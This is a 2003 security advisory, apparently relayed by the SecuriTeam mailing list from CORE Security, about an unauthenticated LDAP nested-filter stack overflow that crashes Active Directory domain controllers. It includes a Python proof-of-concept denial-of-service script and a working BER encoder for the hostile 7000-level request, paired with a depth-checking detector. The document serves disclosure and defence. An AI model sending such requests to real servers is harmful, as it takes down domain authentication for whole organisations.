[NT] Active Directory Stack Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 07/06/03

  • Next message: SecuriTeam: "[UNIX] MacOS X's Screensaver Can Be Crashed Allowing Full Access to Desktop"
    To: list@securiteam.com
    Date: 6 Jul 2003 20:06:48 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Active Directory Stack Overflow
    ------------------------------------------------------------------------

    SUMMARY

    Active Directory, which is an essential component of the Windows 2000
    architecture, presents organizations with a directory service designed for
    distributed computing environments. Active Directory allows organizations
    to centrally manage and share information on network resources and users
    while acting as the central authority for network security.

    The directory services provided by Active Directory are based on the
    Lightweight Directory Access Protocol (LDAP) and thus Active Directory
    objects can be stored and retrieved using the LDAP protocol.

    A vulnerability in Active Directory allows a remote attacker to crash, and
    thereby force a reboot of, any Windows 2000 Server running the Active
    Directory service.

    The vulnerability is triggered when an LDAP version 3 search request
    containing more than 1000 nested "AND" filters is sent to the server. The
    server overflows its stack while handling the filter, crashing the
    Lsass.exe process (the Local Security Authority Subsystem, which hosts the
    directory service on a domain controller).

    This in turn forces the domain controller to stop responding, making a
    denial of service attack against it possible. The LDAP request does not
    need to be authenticated.

    The possibility of exploiting this vulnerability to execute arbitrary code
    on a vulnerable server has not been demonstrated, but it has not been
    ruled out either.

    DETAILS

    Vulnerable systems:
     * Windows 2000 Server with Active Directory (Service Pack 3).

    Immune systems:
     * Windows 2000 Server with Active Directory (Service Pack 4).

    Technical Description - Exploit/Concept Code:
    A 'search request' created using LDAP version 3 and constructed with more
    than 1000 nested "AND" filters provokes a stack overflow, making the
    Lsass.exe service crash and rebooting the machine within 30 seconds.

    To reproduce the stack overflow, you need to create a 'search request' to
    an Active Directory server. The 'search request' must search for a
    machine that does not exist in the domain controller you have previously
    bound to.

    It must be composed of more than 1000 nested AND filters; OR, GE, LE and
    the other binary filter operators are expected to yield the same result.

    Example of a Python script that creates such a request (the Ldap base
    class and the asn1 module it relies on are not included in the advisory;
    the script is shown as CORE published it, with line wraps repaired):
    ----------------------------------------
    class ActiveDirectoryDOS( Ldap ):

        def __init__(self):
            self._s = None
            self.host = '192.168.0.1'
            self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'
            self.port = 389
            self.buffer = ''
            self.msg_id = 1
            Ldap.__init__(self)

        def generateFilter_BinaryOp( self, filter ):
            # (operator, attribute, value) -> one BER-encoded filter item
            filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + \
                           asn1.OCTETSTRING(filter[2]).encode()
            filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
            return filterBuffer

        def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
            # wrap the simple filter in numTimes nested ANDs:
            # AND(AND(AND(simple, simple), simple), simple) ...
            simpleBinOp = self.generateFilter_BinaryOp( filter )
            filterBuffer = simpleBinOp
            for cnt in range( 0, numTimes ):
                filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND,
                                                       filterBuffer + simpleBinOp )
            return filterBuffer

        def searchSub( self, filterBuffer ):
            # anonymous bind, then the oversized search request
            self.bindRequest()
            self.searchRequest( filterBuffer )

        def run(self, host = '', basedn = '', name = '' ):

            # the machine must not exist
            machine_name = 'xaxax'

            filterComputerNotInDir = \
                (Ldap.LDAP_FILTER_EQUALITY, 'name', machine_name)

            # execute the anonymous query
            print 'executing query'
            filterBuffer = self.generateFilter_RecursiveBinaryOp(
                filterComputerNotInDir, 7000 )
            self.searchSub( filterBuffer )
    ----------------------------------------
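    The request the advisory describes, and a check against it, as an added
    example that is not part of the CORE advisory or of its test framework:
    it builds the BER-encoded LDAPv3 SearchRequest with N nested AND filters
    around (name=xaxax), exactly the shape generateFilter_RecursiveBinaryOp
    produces, and then measures the filter's nesting depth from the raw bytes
    the way a protocol-aware proxy or IDS in front of a domain controller
    could. The tag values come from RFC 2251 and the base DN from the script
    above; MAX_FILTER_DEPTH is an assumed policy threshold, not a limit taken
    from Microsoft or from the advisory.

```python
# Added example, not CORE's code: encode the nested-AND SearchRequest the
# advisory describes and measure filter nesting depth from raw BER bytes.
# Tags per RFC 2251; MAX_FILTER_DEPTH is an assumed policy limit.

FILTER_AND = 0xA0        # Filter CHOICE [0] SET OF Filter (constructed)
FILTER_OR = 0xA1         # [1]
FILTER_NOT = 0xA2        # [2]
FILTER_EQUALITY = 0xA3   # [3] AttributeValueAssertion
SEARCH_REQUEST = 0x63    # [APPLICATION 3] SearchRequest (constructed)
MAX_FILTER_DEPTH = 50    # assumed; legitimate clients nest a handful at most


def ber_len(n):
    """Definite-form BER length: short form below 128, long form above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, 'big')
    return bytes([0x80 | len(body)]) + body


def tlv(tag, value):
    return bytes([tag]) + ber_len(len(value)) + value


def octet_string(s):
    return tlv(0x04, s.encode())


def equality_filter(attr, value):
    """(attr=value), e.g. (name=xaxax) for a machine that does not exist."""
    return tlv(FILTER_EQUALITY, octet_string(attr) + octet_string(value))


def nested_and_filter(inner, depth):
    """AND(AND(AND(inner, inner), inner) ...): `depth` nested AND filters,
    the same construction as generateFilter_RecursiveBinaryOp above."""
    buf = inner
    for _ in range(depth):
        buf = tlv(FILTER_AND, buf + inner)
    return buf


def search_request(msg_id, base_dn, filt):
    """LDAPMessage { messageID, SearchRequest }; msg_id assumed below 128."""
    body = (octet_string(base_dn)
            + tlv(0x0A, b'\x02')    # scope: wholeSubtree
            + tlv(0x0A, b'\x00')    # derefAliases: neverDerefAliases
            + tlv(0x02, b'\x00')    # sizeLimit 0
            + tlv(0x02, b'\x00')    # timeLimit 0
            + tlv(0x01, b'\x00')    # typesOnly FALSE
            + filt
            + tlv(0x30, b''))       # attributes: empty SEQUENCE
    return tlv(0x30, tlv(0x02, bytes([msg_id])) + tlv(SEARCH_REQUEST, body))


def read_tlv(buf, pos):
    """Parse one definite-length BER TLV at pos -> (tag, value_start, value_end)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], 'big')
        pos += n
    return tag, pos, pos + length


def filter_depth(buf, start=0):
    """Deepest AND/OR/NOT nesting of the filter at `start`. Walks with an
    explicit stack, so the checker itself cannot overflow on hostile input."""
    deepest = 0
    stack = [(start, 1)]
    while stack:
        pos, d = stack.pop()
        tag, vstart, vend = read_tlv(buf, pos)
        if tag in (FILTER_AND, FILTER_OR, FILTER_NOT):
            deepest = max(deepest, d)
            p = vstart
            while p < vend:
                stack.append((p, d + 1))
                _, _, p = read_tlv(buf, p)
    return deepest


def search_filter_offset(msg):
    """Offset of the Filter in an LDAPMessage carrying a SearchRequest
    (the 7th element of SearchRequest, right after typesOnly)."""
    tag, pos, _ = read_tlv(msg, 0)          # LDAPMessage ::= SEQUENCE
    if tag != 0x30:
        raise ValueError('not an LDAPMessage')
    _, _, pos = read_tlv(msg, pos)          # messageID INTEGER
    tag, pos, _ = read_tlv(msg, pos)        # protocolOp
    if tag != SEARCH_REQUEST:
        raise ValueError('not a SearchRequest')
    for _ in range(6):                      # baseObject .. typesOnly
        _, _, pos = read_tlv(msg, pos)
    return pos


def is_suspicious_search(msg, max_depth=MAX_FILTER_DEPTH):
    """True when the request's filter nests deeper than the policy allows."""
    return filter_depth(msg, search_filter_offset(msg)) > max_depth


if __name__ == '__main__':
    base = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'   # DN from the advisory
    eq = equality_filter('name', 'xaxax')
    for label, depth in (('benign', 1), ('hostile', 7000)):
        msg = search_request(1, base, nested_and_filter(eq, depth))
        print('%s: %d bytes, depth %d, suspicious=%s' % (label, len(msg),
              filter_depth(msg, search_filter_offset(msg)), is_suspicious_search(msg)))
```

    Run stand-alone it shows that the 7000-level request is on the order of a
    hundred kilobytes, so it costs the attacker almost nothing to send. The
    depth counter deliberately uses an explicit stack rather than recursion:
    a recursive walk of the filter is precisely the kind of code such a
    request overflows, so a detector written that way would fall over before
    the domain controller did.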

    Solution/Vendor Information/Workaround:
    This issue is fixed in Windows 2000 Service Pack 4, which can be downloaded
    from:
    http://www.microsoft.com/Windows2000/downloads/servicepacks/sp4/

    Further information about the vulnerability can be obtained from:
    http://support.microsoft.com/default.aspx?kbid=319709

    Vendors contacted:
     - Microsoft
        . Core Notification: 2003-05-16
        . Notification acknowledged by Microsoft: 2003-05-19
        . Issue fixed in Windows 2000 Service Pack 4: 2003-06-26

    ADDITIONAL INFORMATION

    The original advisory can be downloaded from:
    http://www.coresecurity.com/common/showdoc.php?idx=351&idxseccion=10

    The information has been provided by CORE Security Technologies
    Advisories (advisories@coresecurity.com).

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

